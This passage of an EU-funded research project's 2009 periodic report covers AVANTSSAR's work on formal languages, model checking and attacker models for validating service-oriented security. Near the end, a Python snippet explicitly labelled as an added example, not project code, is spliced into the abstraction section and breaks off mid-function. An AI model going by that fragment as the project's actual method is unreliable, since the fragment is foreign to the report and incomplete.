Source: avantssar.eu/pdf/deliverables/avantssar-ppr-P2.pdf

PROJECT PERIODIC REPORT

Grant Agreement number: 216471

Project acronym: AVANTSSAR

Project title: Automated Validation of Trust and Security of Service-oriented Architectures

Funding Scheme: Small/medium-scale focused research project (STREP), Seventh Framework Programme, Theme ICT-1.1.4

Date of latest version of Annex I against which the assessment will be made: 17 / 10 / 07

Periodic report: 1st □ 2nd √ 3rd □

Period covered: from 01 / 01 / 09 to 31 / 12 / 09

Name, title and organisation of the scientific representative of the project's coordinator:

Prof. Luca Viganò, Università degli Studi di Verona, Department of Computer Science, Strada le Grazie 15, 37134 Verona, Italy

Mobile: +39 320 4251233

Tel: +39 0458027070

Fax: +39 0458027068

E-mail: [email protected]

Project website address: www.avantssar.eu

Automated VAlidatioN of Trust and Security of Service-oriented ARchitectures

FP7-ICT-2007-1, Project No. 216471

www.avantssar.eu

Deliverable D1.4: Progress/Assessment Report for Year 2

(Period P2: 01.01.09 — 31.12.09)

Abstract

This Periodic Progress Report covers the second year of the AVANTSSAR project. It consists of a publishable executive summary, an overview of the project objectives for the period, the work progress and achievements during the period, the deliverables and milestones, and a summary of the project management, including an explanation of the use of the resources and the corresponding financial statements.

Deliverable details
Deliverable version: v1.1
Classification: public
Date of delivery: 18.04.2010 (v1.0: 05.02.2010)
Due on: 05.02.2010
Editors: all
Total pages: 165

Project details
Start date: January 01, 2008
Duration: 36 months
Project Coordinator: Luca Viganò
Partners: UNIVR, ETH Zurich, INRIA, UPS-IRIT, UGDIST, IBM, OpenTrust, IEAT, SAP, SIEMENS


Contents

1 Publishable summary (p. 10)
1.1 Project objectives and main expected results (p. 10)
1.2 Project impact (p. 12)
1.3 Achievements and main results so far (p. 12)
1.4 Dissemination and use so far (p. 14)

2 Project objectives for the period (p. 15)

3 Work progress and achievements during the period (p. 16)
3.1 Work progress and achievements by WP (p. 16)
3.1.1 WP2: Modeling trust and security aspects of service-oriented architectures (p. 16)
3.1.2 WP3: Automated reasoning techniques (p. 18)
3.1.3 WP4: Validation Platform (p. 26)
3.1.4 WP5: Proof of concept (p. 28)
3.1.5 WP6: Dissemination and industry migration (p. 34)
3.2 Resources (p. 42)

4 Deliverables and milestones tables (p. 43)
4.1 Deliverables list (p. 43)
4.1.1 Deliverable D1.4 (p. 45)
4.1.2 Deliverable D2.2 (p. 46)
4.1.3 Deliverable D4.1 (p. 47)
4.1.4 Deliverable D6.1 (p. 48)
4.2 Milestones list (p. 49)

5 Project Management (p. 51)
5.1 Project Planning and Timetable (GANTT Chart) (p. 51)
5.2 Project Management and Coordination (p. 51)
5.2.1 Project Meetings (p. 51)
5.2.2 Task-forces (p. 53)
5.2.3 Website (p. 53)
5.2.4 Mailing lists (p. 54)
5.2.5 SVN Server (p. 55)
5.3 Use of foreground and dissemination activities (p. 55)
5.3.1 Project Workshops and Conferences, Lectures, Tutorials (p. 55)
5.3.2 European and international projects and working groups (p. 56)
5.4 Involvement of project participants in scientific events (p. 61)
5.5 AVANTSSAR publications and drafts (p. 67)
5.6 AVANTSSAR theses (p. 71)
5.7 AVANTSSAR talks and presentations (p. 72)

6 Explanation of the use of the resources (p. 79)
6.1 Resources (p. 80)
6.2 Explanation of personnel costs, subcontracting and any major direct costs (p. 95)
6.3 General project meetings (p. 122)
6.3.1 First AVANTSSAR Workshop and First Review Meeting (p. 122)
6.3.2 ASLan v.2 Meeting (p. 123)
6.3.3 2nd Synchronization Meeting (p. 124)
6.3.4 WP4 Meeting (p. 125)
6.4 Working meetings (p. 126)
6.4.1 Definition and application of a distributed temporal logic for the analysis of security protocols and services (p. 126)
6.4.2 Technical meeting on WP5: SAML SSO (p. 127)
6.4.3 Meeting on model-checking for authorization policies (p. 128)
6.4.4 Meeting on orchestration work (p. 129)
6.4.5 Working Meeting on WP6.2: SAP NW BPM (p. 130)
6.4.6 Meeting on secure pseudonymous channels (p. 131)
6.4.7 Definition and application of a distributed temporal logic for the analysis of security protocols and services (p. 132)
6.4.8 AVANTSSAR technical synchronization meeting on WP4 and WP6 (p. 133)
6.4.9 Working Meeting on Dynamic Policies, Services, and Composition (p. 134)
6.4.10 Working Meeting on WP2 and WP3 (p. 135)
6.4.11 Working Meeting on WP4 and WP5 (p. 136)
6.4.12 Working Meeting on WP6.2: SAP NW NGSSO and SAP NW BPM (p. 137)
6.5 Participation to European and scientific events (p. 138)
6.5.1 6th ACM Workshop on Formal Methods in Security Engineering (FMSE 2008) co-located with Computer Communication Security (p. 138)
6.5.2 ARES'09 (p. 139)
6.5.3 ARSPA-WITS'09 and working meeting at Imperial College (p. 140)
6.5.4 IWSP 2009, 17th International Workshop on Security Protocols (p. 141)
6.5.5 Future Internet Conference Prague 2009 (p. 142)
6.5.6 Applied Cryptography and Network Security, 7th International Conference (p. 143)
6.5.7 9th International School on Formal Methods for the Design of Computer, Communication and Software Systems: Web Services (SFM-09:WS) (p. 144)
6.5.8 Cinquièmes Journées Francophones MODÈLES FORMELS de l'INTERACTION (MFI'09) (p. 145)
6.5.9 Conference on Automated Reasoning with Analytic Tableaux and Related Methods (Tableaux) and Workshop on First-Order Theorem Proving (FTP) 2009 (p. 146)
6.5.10 Logic Colloquium 2009 (p. 147)
6.5.11 9th International School on Foundations of Security Analysis and Design (FOSAD) (p. 148)
6.5.12 6th International Conference on Trust, Privacy and Security in Digital Business (TrustBus'09) (p. 149)
6.5.13 12th International Information Security Conference 2009 (p. 150)
6.5.14 Summer School on Provable Security (p. 151)
6.5.15 ESORICS'09 (p. 152)
6.5.16 4th International Conference on Risks and Security of Internet and Systems 2009 (CRISIS 2009) (p. 153)
6.5.17 Stabilization, Safety, and Security of Distributed Systems, 11th International Symposium, SSS 2009 (p. 154)
6.5.18 FAST'09 (p. 155)
6.5.19 Methods for Modalities (M4M 2009) (p. 156)
6.5.20 FIA Stockholm and Workshop with the SHIELDS Project (p. 157)

7 Planned work for the next reporting period (p. 158)

8 Financial statements – Forms C and Summary financial report (signed originals sent in parallel by post) (p. 161)

9 Certificates (signed originals sent in parallel by post) (p. 162)

List of Figures

1 The AVANTSSAR Validation Platform and its usage towards Enterprise SOA (TS abbreviates Trust and Security). (p. 11)
2 The SAML Modeling Environment. (p. 39)
3 The SAML Modeling Environment: pop-up warning. (p. 40)
4 The SAML Modeling Environment: validation feature. (p. 41)
5 GANTT Chart of the AVANTSSAR Project. (p. 52)

List of Tables

1 Application areas and the related families of problem cases. (p. 30)
2 Deliverables. (p. 44)
3 Milestones (and decision points). (p. 50)
4 Total resources for Period P2. (p. 81)
5 Total resources for Period P2 (full table, part 1/3). (p. 82)
6 Total resources for Period P2 (full table, part 2/3). (p. 83)
7 Total resources for Period P2 (full table, part 3/3). (p. 84)
8 Resources for Period P2: UNIVR. (p. 85)
9 Resources for Period P2: ETH Zurich. (p. 86)
10 Resources for Period P2: INRIA. (p. 87)
11 Resources for Period P2: UPS-IRIT. (p. 88)
12 Resources for Period P2: UGDIST. (p. 89)
13 Resources for Period P2: IBM. (p. 90)
14 Resources for Period P2: OpenTrust. (p. 91)
15 Resources for Period P2: IEAT. (p. 92)
16 Resources for Period P2: SAP. (p. 93)
17 Resources for Period P2: SIEMENS. (p. 94)
18 Total costs for Period P2. (p. 96)
19 Costs for Period P2: UNIVR. (p. 97)
20 Costs for Period P2: UNIVR adjustment. (p. 98)
21 Costs for Period P2: UNIVR (details). (p. 99)
22 Costs for Period P2: ETH Zurich. (p. 100)
23 Costs for Period P2: ETH Zurich (details). (p. 101)
24 Costs for Period P2: INRIA. (p. 102)
25 Costs for Period P2: INRIA (details). (p. 103)
26 Costs for Period P2: University of Nancy. (p. 104)
27 Costs for Period P2: UPS-IRIT. (p. 105)
28 Costs for Period P2: UPS-IRIT (details). (p. 106)
29 Costs for Period P2: CNRS. (p. 107)
30 Costs for Period P2: CNRS (details). (p. 108)
31 Costs for Period P2: UGDIST. (p. 109)
32 Costs for Period P2: UGDIST (details). (p. 110)
33 Costs for Period P2: IBM. (p. 111)
34 Costs for Period P2: IBM (details). (p. 112)
35 Costs for Period P2: OpenTrust. (p. 113)
36 Costs for Period P2: OpenTrust (details). (p. 114)
37 Costs for Period P2: IEAT. (p. 115)
38 Costs for Period P2: IEAT (details). (p. 116)
39 Costs for Period P2: SAP. (p. 117)
40 Costs for Period P2: SAP adjustment. (p. 118)
41 Costs for Period P2: SAP (details). (p. 119)
42 Costs for Period P2: SIEMENS. (p. 120)
43 Costs for Period P2: SIEMENS (details). (p. 121)
44 Deliverables due in Period P3. (p. 159)
45 Milestones (and decision points) of Period P2. (p. 160)

1 Publishable summary

1.1 Project objectives and main expected results

Driven by rapidly changing requirements and business needs, IT systems and applications are undergoing a paradigm shift: components are replaced by services distributed over the network, and composed and reconfigured dynamically in a demand-driven way into service-oriented architectures.

Deploying services in future network infrastructures entails a wide range of trust and security issues. Solving them is extremely hard since making the service components trustworthy is not sufficient: composing services leads to new, subtle and dangerous vulnerabilities due to interference between component services and policies, the shared communication layer, and application functionality. Thus, one needs validation of both the service components and their composition into secure service architectures.

AVANTSSAR proposes a technology for the formal specification and Automated VAlidatioN of Trust and Security of Service-oriented ARchitectures. This technology will include an integrated toolset, the AVANTSSAR Validation Platform, which will be tuned on relevant industrial case studies. More specifically, the project will develop:

• ASLan, the first formal language for specifying trust and security properties of services, their associated policies, and their composition into service architectures.

• Automated techniques to reason about services, their associated security policies, and their dynamic composition into secure service architectures.

• The AVANTSSAR Validation Platform, an automated toolset for validating trust and security aspects of service-oriented architectures, depicted in Figure 1.

• A library of validated composed services and service architectures, proving that the AVANTSSAR technology scales to the envisaged applications.

Migrating project results to industry and disseminating them to standardization organizations will speed up the development of new network and service infrastructures, enhance their security and robustness, and increase the public acceptance of emerging IT systems and applications based on them.

[Figure 1: The AVANTSSAR Validation Platform and its usage towards Enterprise SOA (TS abbreviates Trust and Security). Legend: P = Policy, S = Service, CP = Composed Policy, CS = Composed Service; arrow styles distinguish tool input/output, policy, and vulnerability. Elements shown: the specification of the available services and a (new) service to be specified; connectors for BPMN + Annotations, BPEL + Annotations and AnB (CONNECTOR); ASLan v.2, translated to ASLan v.1.1; the orchestration/composition and validation problem handed to the TS ORCHESTRATOR and the TS VALIDATOR; the resulting insecure composed service/policy returned with feedback, or the secured service/policy deployed as secure services through the TS Wrapper.]

1.2 Project impact

The main impact targets are industry, research institutions, and standardization bodies working on the design of Web Services and service-oriented architectures, focusing in particular on their trust and security aspects. Since European society as a whole will ultimately benefit from the results of the project (in terms of increased reliability and acceptance of, and confidence in, service-oriented architectures, in particular in e-health, e-government, e-market, etc.), special measures are planned to reach the public.

1.3 Achievements and main results so far

All the project objectives for the second reporting period have been successfully achieved. The following are the main results we obtained:

Modeling trust and security aspects of service-oriented architectures. We have defined two versions of the AVANTSSAR Specification Language (ASLan), which allows one to formally model trust and security-related aspects of service-oriented architectures to be validated by the AVANTSSAR Validation Platform. ASLan v.1 (and its extension ASLan v.1.1) supports the formal modeling of trust and security-related aspects of the basic building blocks of service-oriented architectures. ASLan v.2 allows for the formal specification of static service and policy composition, and it borrows notions from procedural and object-oriented programming languages in order to be usable by those who are not experts in formal protocol/service specification languages. ASLan v.2 is a higher-level language than ASLan v.1, and the AVANTSSAR Validation Platform accepts as input specifications written in either ASLan v.2 or ASLan v.1/ASLan v.1.1 (in the former case, the specification is automatically translated into a "platform-internal" ASLan v.1.1 specification), so that the formal validation of the input problem can be carried out.

Automated reasoning techniques. We have been developing a number of techniques to automatically reason about services and policies formally specified using ASLan. These techniques allow for satisfiability checking of ASLan policies, for model checking of ASLan services with respect to policies, and for compositional reasoning about services and policies. Automated reasoning about a variety of attacker models is also supported, as well as a number of abstraction techniques for composed services and policies.


AVANTSSAR Validation Platform. We have implemented a prototype of the AVANTSSAR Validation Platform as a service-oriented architecture. The platform takes as input a policy stating the functional and security requirements of a goal service and a description of the available services (including a specification of their security-relevant behavior, possibly including the local policies they satisfy), and applies automated reasoning techniques in order to build an orchestration of the available services that meets the security requirements stated in the policy. The platform comprises two main components: the Orchestrator tries to build an orchestration, i.e. a composition, of the available services in a way that is expected (but not yet guaranteed) to satisfy the input policy; the Validator automatically analyses the validation problem resulting from the Orchestrator output. A failed validation means the existence of vulnerabilities that need to be fixed; otherwise the composition of the services is guaranteed to be secure, i.e. to meet the input policy, relative to the attacker model and the abstractions fixed in the specification.

Proof of concept. We have begun the selection and formalization of industry-relevant problem cases as ASLan specifications and their validation using the verification tools developed within the project. We have formalized 6 case studies and validated 13 problem cases, thus covering all proposed areas and a large majority of the targeted problem cases. This evaluation phase has been instrumental in several respects. In terms of formalization, we have confirmed the suitability of our specification language and refined several choices. For validation and orchestration, we have tested the new features incorporated into the tools, notably the handling of policies and dynamicity. In terms of performance, the tools have successfully handled all case studies, some of which were quite large; however, some verification problems have tested the limits of the tool set: these have required manual adaptation of the model or have been handled only by some of the tools. Consequently, we are undertaking optimizations both of the ASLan v.2 to ASLan v.1.1 translator and of the back-ends.

Dissemination and industry migration. Dissemination and migration of the project results into the scientific community, standardization organizations and industry is well underway. In particular, contacts with core business units at the industrial partners of AVANTSSAR have been consolidated and a number of valuable migration activities have been carried out: the application of AVANTSSAR to formally analyze the SAP NetWeaver SAML Next Generation Single Sign-On services; the exploitation of AVANTSSAR technology to formally analyze security-critical aspects of business processes within the SAP NetWeaver BPM product solution; the application of AVANTSSAR languages and techniques to service-oriented architectures developed at IBM; and the integration of AVANTSSAR technology into the service-oriented applications developed at OpenTrust.

1.4 Dissemination and use so far

AVANTSSAR represents an unprecedented effort to apply automated validation methods to trust and security aspects of service-oriented architectures comprising composed services, and it has therefore been generating considerable interest in both academia and industry. Dissemination and use of foreground thus have a high priority, and we have planned appropriate measures to ensure an effective and timely dissemination of the project results to potential users, both at the European level and world-wide.

During the second year, the project participants produced 30 papers published or currently in print about the project's foreground (amounting to 49 papers since the start of the project), and 7 more papers are currently submitted. Further papers are in preparation. Foreground and other information related to AVANTSSAR have been presented in 45 (87 in total) talks, presentations and demos by project participants. Moreover, AVANTSSAR has supported or been involved in, through the participants, 40 (74 in total) scientific events about topics directly related to the project.

More information (including project details, deliverables, publications, software, news, press-kits and a demo video of the vulnerability of the SAML-based Single Sign-On service for Google Apps that we discovered in the course of the first project year) is available at

www.avantssar.eu


2 Project objectives for the period

The technical objectives of the project in the second reporting period were:

• Definition of Version 2 of the AVANTSSAR Specification Language (ASLan v.2) for the specification of security-sensitive service-oriented architectures, the associated security policies, and their trust and security properties. In particular, ASLan v.2 should allow for the formal specification of static service and policy composition.

• The development of techniques for satisfiability checking of ASLan policies, for model checking of service-oriented architectures with respect to policies, for the analysis of web service security under different attacker models, for compositional reasoning about services and policies, and for the validation of composed services and policies with the help of different abstraction approaches.

• Design and prototypical implementation of the AVANTSSAR Validation Platform v. 1.

• Formalization of industry-relevant problem cases as ASLan specifications and their validation using the verification tools developed within the project.

• Dissemination and migration of the project results into the scientific community, industry and standardization bodies. In particular, in the second reporting period, the project should start the migration of its technologies to the industrial development environments of IBM, OpenTrust and SAP.

As illustrated in more detail in the following sections, these objectives have been fully achieved.


3 Work progress and achievements during the period

3.1 Work progress and achievements by WP

3.1.1 WP2: Modeling trust and security aspects of service-oriented architectures

Workpackage Objective. The objective is the definition of the syntax and semantics of the AVANTSSAR Specification Language (ASLan), which allows one to formally model trust and security-related aspects of service-oriented architectures to be validated by the AVANTSSAR Validation Platform.

Workpackage Achievements

WP2.1 Atomic services and non-composed policies. This subworkpackage is dedicated to the definition of ASLan v.1, which allows for the specification of atomic services and non-composed policies. The work on this subworkpackage was finished in the first year of the project (see Deliverable D2.1 [AVA08b]).

WP2.2 Static service and policy composition. The objective of this subworkpackage is to extend ASLan so as to allow for static composition of services and policies. The extended version of ASLan, i.e. ASLan v.2, borrows notions from procedural and object-oriented programming languages in order to be usable by those who are not experts in formal protocol/service specification languages. The following features of ASLan v.2 are particularly useful in formally modeling static service and policy compositions:

• Control flow constructs (e.g. while and if). These allow for specifying services in a concise manner using concepts familiar to most programmers.

• Modularity via the notion of an entity. This allows for specifying services separately, and instantiating them multiple times or composing them with other services. Moreover, modularity helps in localizing policies to individual services, and in precisely mapping out their trust relations.

• Annotated channels. These provide an intuitive notation for expressing properties of communication channels that are used both as service assumptions and as service goals.


ASLan v.2 is translated to ASLan v.1.1, which is in turn an extension of ASLan v.1. The translation defines the semantics of ASLan v.2. ASLan v.1.1 consists of a number of technical improvements over ASLan v.1. In particular, it introduces the notion of macro steps, which allows abstracting from the internal computations of honest services.

WP2.3 Dynamic service and policy composition. The objective of this subworkpackage is to further extend ASLan's capability of expressing static composition of services and policies to dynamic composition. The work on this subworkpackage has recently started, and the resulting language, ASLan v.3, will be described in Deliverable D2.3. In order to simplify terminology and ease the use of the AVANTSSAR Platform, we will deploy the languages with the following simple names:

• the lower-level specification language (currently ASLan v.1/ASLan v.1.1) will simply be called ASLan,

• the higher-level specification language (currently ASLan v.2/ASLan v.3) will simply be called ASLan++.

Dynamic service composition in the context of AVANTSSAR refers to the situation where the services choose their partners at run time, and therefore the composition of services is not fixed a priori. The typical dynamic binding scenario envisioned, e.g., in the Universal Description, Discovery and Integration (UDDI) standard [Con] would be an instance of dynamic composition of services: Web servers announce their services and their interface requirements on a service broker, and clients can then look up the broker's directory in order to determine which of the services advertised there satisfy their policies. After this service discovery phase, clients would bind to a suitable service provider, if any. The AVANTSSAR Platform can be used to validate the security requirements of service providers, their clients, and the channels connecting them, as determined in such dynamic scenarios.

Dynamic policies in the context of AVANTSSAR refer to the situation where the security policies that govern services and their composition depend on the state of the services, and can therefore change while the services evolve. For instance, in the context of administrative RBAC [Cra05], Alice may have the role user in a state S, and be upgraded to the role manager in the next state S', due to some condition (e.g. the administrator decides that, since all the managers are on vacation in state S', Alice should take the manager role). The authorization rights of Alice evolve correspondingly when moving from S to S'. The policies governing the system in S are therefore different from those in S'. The AVANTSSAR Platform can be used to validate the security requirements of services and their policies, as determined in such dynamic scenarios.

3.1.2 WP3: Automated reasoning techniques

Workpackage Objective. The objective is the development of reasoning techniques and of theoretical results that will be implemented in WP4 in the AVANTSSAR Validation Platform. These techniques focus on the logics and models defined using the ASLan language developed in WP2.

Workpackage Achievements

WP3.1 Satisfiability of ASLan policies. Policies have been considered at several levels:

Trust negotiation and access control. We have continued the work on the logical modeling of access control systems. Our emphasis this year was on the expression of different kinds of delegation in a distributed environment. We have also formalized trust negotiation as a functionality that can be called by agents before entering a task or executing an action. These advances are part of Marwa El Houri's PhD thesis (partially funded by AVANTSSAR) and have been published in [9, 10]. Moreover, in the manuscript [35] Mounira Kourjieh and Yannick Chevalier have investigated conditions under which the entailment problems for ASLan-like sets of clauses are decidable. They propose an ordered saturation procedure similar to the one in [BG01], though with fewer restrictions on the possible orderings, such that, whenever it terminates, it outputs a set of clauses for which the ground entailment problem, and thus the problem of deciding whether a transition is applicable in ASLan, is decidable.

Request message analysis and response synthesis. Given the specification of a communication scenario between two or more peers, one would like to know, first, whether this scenario is implementable, and second, find the specification of a secure implementation. The first problem was treated in [CMR08] to obtain executable Web Services Orchestration scenarios. The second was considered in the context of security protocol compilation as the problem of interpreting Alice and Bob specifications and was addressed independently by [24] and [17]. In contrast to previous approaches to defining a formal language based on Alice and Bob notation, these works define the semantics with respect to an arbitrary algebraic theory of the cryptographic primitives. In fact, both works essentially arrive at equivalent definitions of a formal AnB language (although the presentation differs). Note that, due to the generality, this semantics comprises some problems that are undecidable for arbitrary algebraic theories. [24] shows that these problems are solvable for the theories of exponentiation and exclusive or, while [17] gives a more general account and relates the decision problems to static equivalence so that existing results can be used. [24] is the basis of the AnB language that IBM uses as an ISSL (see also the description of WP6), while the orchestrator is based on the methods of [17].

Resolution of structural constraints. We have extended in [16] the work of [CMR08] to take into account the properties of the orchestrated services and ordering constraints between different actions. In this work, the structural constraints are implemented by certificates sent and received along with the messages, and the orchestration problem is entirely based on the payload of the messages and certificates.
We have also considered a more traditional approach to orchestration in which the services are abstracted as conditional communicating automata. In this setting, the orchestration problem is parameterized both by the communication model and by the relation between the goal service and the orchestrated one.
We have considered the standard relations between the goal and the orchestrated service, i.e., trace inclusion, trace equivalence, simulation and bisimulation. For each of these relations, we have studied the decidability of the orchestration problem when the port size is unbounded. Besides the decidability results obtained in [39], we have proposed three variants of the initial model: a simplified version in [BCF07, BCDP08], with bounded ports and asynchronous communications in [BCF08b, BCF08a, 12, 11], and with synchronous communications [13]. In the latter case, we have additionally considered Quality of Service constraints in the orchestration.

Negotiation Strategies. UNIVR [33] has recently begun working on the formalization and implementation of strategies for meaning negotiation, the general process with which two agents reach an agreement about the meaning of a set of terms: each agent discusses with the other one her viewpoint by exhibiting it in an actual set of constraints on the meaning of the negotiated terms. Such an approach will have a direct application to the case where agents negotiate policies without the help of a broker/mediator.

WP3.2 Model-checking of ASLan services with respect to policies.

Bounded model checking. We have developed a bounded model-checking technique for ASLan. We have extended the technique described in [ACC07, AC08], providing support for model checking of LTL formulae as described in [BCCZ99]. We have also extended the SAT encoding technique to support Horn clauses.
We have also evaluated the use of the action language C, which allows for a natural and concise modeling of processes and the associated security policies [4]. In particular, C provides a rich and natural specification framework for the formal specification of processes and the associated security policy by supporting a wide variety of features, e.g., noninertial and exogenous facts, nondeterminism, indirect and conditional effects, and implicit preconditions. [4] shows that the use of C greatly simplifies the specification step, offering a rich and concise way to model desired features of business processes under authorization constraints. As a result, we will evaluate extensions of ASLan to enhance its expressiveness towards some key features of C. The extensions of the language will then be supported by bounded model checking techniques for the automatic analysis of the resulting specifications.

Logic-based Validation of Service Oriented Applications. The specification of distributed service-oriented applications spans several levels of abstraction encompassing their workflow and access control policies. These levels may interact in subtle ways, and identifying a suitable language able to describe this interplay is a difficult task. Even more difficult is the verification of formal models featuring both levels and their interplay; almost all of the available works in the literature address at most one level at a time, sometimes using coarse abstractions. For example, the verification of workflows specified in BPEL is done by using (extensions of) Petri nets where the data manipulations are abstracted away. To overcome these problems, in [14, 31] we propose a declarative two-level framework for the formal specification of SOA applications in the context of a first-order temporal logic extended with theories. This provides a rich and uniform framework where complex systems can be naturally specified and it is possible to identify conditions which are sufficient for the automated analysis of specifications. For example, we were able to characterize the decidability of the symbolic execution of some classes of SOA applications, which is interesting for scenario validation and debugging. We have started developing a tool (eventually to be integrated into the AVANTSSAR Platform) that integrates state-of-the-art automated reasoning technologies in order to provide support for the mechanization of this framework. In future work, we will study techniques to approximate the logic programming semantics (especially negation as failure) of policy languages in our purely declarative framework and investigate ways to adapt existing techniques for the synthesis of invariants, which will be useful both at the workflow and at the policy level.

WP3.3 Attacker models. We have extended and refined the standard Dolev-Yao attacker of security protocol analysis in order to capture new aspects of web service security:

Hierarchy of compromising attackers. In the first project year, we developed a hierarchy of compromising attackers in a symbolic framework. In the second year, we built on this framework by exploring the relation between our attacker models in the symbolic, possibilistic setting (as used within our project) and their computational counterparts from the cryptographic, probabilistic setting. This has clarified the relation between attackers from both settings, revealing subtle differences that had previously gone unnoticed, and revealed many missed cases in published cryptographic proofs. The new insights can help to improve the guarantees provided by the AVANTSSAR Platform, and make their relation to cryptographic proofs explicit.

Multi-attacker. In the first year of the project, we formalized a new threat model, referred to as the General Attacker (GA), which features each protocol participant as a potential Dolev-Yao attacker who does not necessarily collude or share knowledge with anyone else. During the second year, we have refined this concept and devised a variant of it, referred to as the Multi-Attacker (MA), which differs from GA in preventing each protocol participant from colluding or sharing knowledge with anyone else.
As in GA, also in MA it is meaningful to continue the analysis of a protocol after an attack is mounted. This can assess whether additional attacks can be mounted either by the same attacker or by different attackers. Even novel scenarios whereby principals attack each other become possible. A significant scenario is that of retaliation, where an attack is followed by a counterattack.
The work has been consolidated on the NSPK protocol and experimented on the SAML-based SSO for Google Apps use case to have some evidence of the scalability of the approach. This research topic led to two publications [7, 8].

Guessing attacks. Continuing work started in the first project year, we have formalized a calculus to model guessing attacks. The central concept is to view cryptographic functions as oracles that can be used either off-line, if known by the adversary, or on-line, by employing protocol participants for this purpose. Oracles can be either observed or controlled by the adversary, giving rise to several cases in which an attacker can guess, formalized in a guessing lemma, which also gives bounds on the number of oracle accesses needed for guessing. The guessing rules can be used in reasoning together with standard Dolev-Yao intruder rules. We have modeled our guessing rules in ASLan as supplementary transition steps that can be added to any model, and have successfully substantiated known guessing attacks on protocols such as Anderson-Lomas, MS-CHAP and NTLM. Moreover, for an ATM system modeled after a real case we have both reproduced known guessing attacks and found new ones.

Attacker on Access Control Systems. We have considered a variant of the standard Dolev-Yao intruder model specialized for the analysis of the security of trust negotiation mechanisms. These results will soon be reported in a paper.

Communication channels. Continuing our work on pseudonymous secure channels [25, 26], we have considered their integration both into the specification languages ASLan v.2 and AnB (see WP6) and into the model-checking methods. The latter is relatively straightforward, since the channels are expressed using standard ASLan v.2/ASLan v.1 constructs that the tools already support. The work on compositional reasoning for channels is described below.


Zero Knowledge Proofs. Further progress has been made on the formalization and model checking of systems that use zero knowledge proofs as a cryptographic primitive (like the Identity Mixer case study). In particular, we can avoid the non-trivial algebraic reasoning required by existing work, and we can also handle relations on credential attributes [37].

WP3.4 Compositional reasoning for services and policies.

Channels for Compositional Reasoning. A central concept in service-oriented architectures is to consider a stack of services or protocols, i.e., a vertical composition. For instance, one may run an application over a secure connection established using TLS. In fact, in many cases one side (e.g. a client, respectively its browser) is not authenticated, and we may rely on an additional layer (e.g., a password protocol or a third party as in Kerberos or single-sign-on systems) to provide the client authentication.
The idea of compositional verification is that instead of verifying a complex composed system, we verify properties of its components individually and infer by a compositionality theorem that their composition preserves their properties. Practically, this allows us to verify complex systems that could not be verified as a whole but where the individual components are sufficiently simple to verify. Moreover, conceptually, we get more general verification results: e.g. one may verify that an application satisfies certain properties, provided that it is run over a secure channel. This result is independent of the concrete protocol that realizes the secure channel (e.g., TLS). Vice versa, we may verify that TLS provides a secure channel, independent of the application that is run over it.
The ongoing work on channels [25, 26] provides a very useful interface for this kind of compositional reasoning. In particular, for several kinds of channels, we have defined what it means that a protocol or service assumes such a channel, and what it means that it provides such a channel. By the compositionality theorem we have proven, any protocol or service that provides a channel can be "plugged in" into a protocol that assumes this kind of channel. This applies to authentic, confidential and secure channels, as well as their "pseudonymous" counterparts that are generated when one side is not authenticated (e.g. in TLS without client authentication). We are currently working on extensions of the channel concept (including replay-protection and generalized exchange methods), and on identifying different sufficient conditions to satisfy the assumptions of our compositionality theorem.

Observational Equivalence. Expressing security properties as observational equivalence properties is particularly suitable for compositional reasoning: one wants to prove that a service or protocol is equivalent to a secure abstraction in any environment. When established, the observational equivalence allows for the replacement of, e.g., a transport protocol by an ideal protocol that has the same properties (e.g., authentication, anonymity, ...). We have investigated a new symbolic method to decide the equivalence of services in the presence of a hostile environment. This equivalence generalizes static equivalence by allowing for active intruders. While we have so far only considered subterm equational theories, we are currently working on an extension to a more general class.

WP3.5 Abstraction techniques for composed services and policies.

Data and Control Abstraction. As part of the development of a new module of the OFMC analysis tool, we are currently extending a popular method for the abstract verification of security protocols on which, for instance, also ProVerif and TA4SP are based (see for instance [Bla01, BHKO04, CLC03]). These techniques involve two kinds of abstractions:

• Abstraction from concrete data: we partition the, in general, infinite set of data into finitely many equivalence classes and compute on the equivalence classes.

• Control Abstraction: we disregard the temporal structure induced by the state transition system and rather consider the set of reachable facts, i.e. facts that are true in some reachable state.

Under certain conditions, both abstractions are sound in the sense that if the original system has an attack then so has the abstract one, but, vice versa, there can be false positives, i.e. attacks on the abstract system when the original system is safe. In the worst case, we may thus be unable to verify a correct system with these methods.
We contribute to the abstract verification idea in several regards:


• We use a CEGAR approach, i.e. an automatic refinement of the data abstraction when a counter-example is found, based on the concrete counter-example.

• We use the verification result, an abstract fixed-point that over-approximates all possible behaviors of the system, to build a machine-checkable security proof (see below for details).

• We are currently working on new forms of abstraction that are better suited for the verification of web-services, i.e. when the system is not a linear exchange of messages as in most security protocols.

Generating Machine-Checkable Proofs. When using complex verification tools with advanced methods as in AVANTSSAR, there is of course a significant risk of bugs in the implementations, or of specifications that fail to meet the subtle assumptions of the employed methods. It is thus easily possible that an incorrect system is accidentally "verified" by an automated tool due to a bug. Our idea is that in the case of the abstract fixed-point verification with OFMC, we obtain a finite representation of (an over-approximation of) the possible behavior of the system. We can use this as a basis to produce an actual proof with respect to the original model of the system that is to be verified, and this proof can be checked by a "neutral" proof checker. IBM and SAP have designed such a proof generation method and implemented a prototype based on OFMC and the theorem prover Isabelle [15]. The key ideas are as follows:

• Each concrete data item of the reference model is labeled with the abstract data item that is used in the abstract verification technique (and thus in the computed fixed-point). Note that this is a mere annotation that does not change the reference model.

• We can define the concretization of the computed (abstract) fixed-point as the set of all traces T′ that can be built from facts of the fixed-point by replacing each abstract data item with any concrete item that is abstracted accordingly.

• We show that T ⊆ T′ for the set of traces T induced by the reference model by showing that T′ is closed under each of the inductive rules that define T.

If the proof is accepted by Isabelle, we can thus be sure that the reference model satisfies the specified properties, provided that the Isabelle core is correctly implemented, but we no longer rely on the correctness of any tools or on the applicability of particular methods.
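The two abstractions of WP3.5 and the closure-based proof idea, as an added example in Python that is not the OFMC or Isabelle code of the project: nonces are abstracted into equivalence classes ("nonce", creator, peer), protocol steps are applied as order-independent rules to compute the fixed-point of reachable intruder facts, and is_closed re-checks that the result is closed under every rule, which is the T ⊆ T′ argument in miniature. The two-message exchange and the agent names are constructed.

```python
# Added example (not OFMC or project code): abstraction-based analysis of a
# constructed two-message public-key exchange. All agent names are hypothetical.
HONEST = ("a", "b")
AGENTS = HONEST + ("i",)        # "i" is the Dolev-Yao intruder

def pk(x): return ("pk", x)
def sk(x): return ("sk", x)
def enc(k, m): return ("enc", k, m)
def pair(x, y): return ("pair", x, y)

def nonce(creator, peer):
    """Data abstraction: all fresh nonces that `creator` makes for `peer`
    collapse into one equivalence class, so the term universe is finite."""
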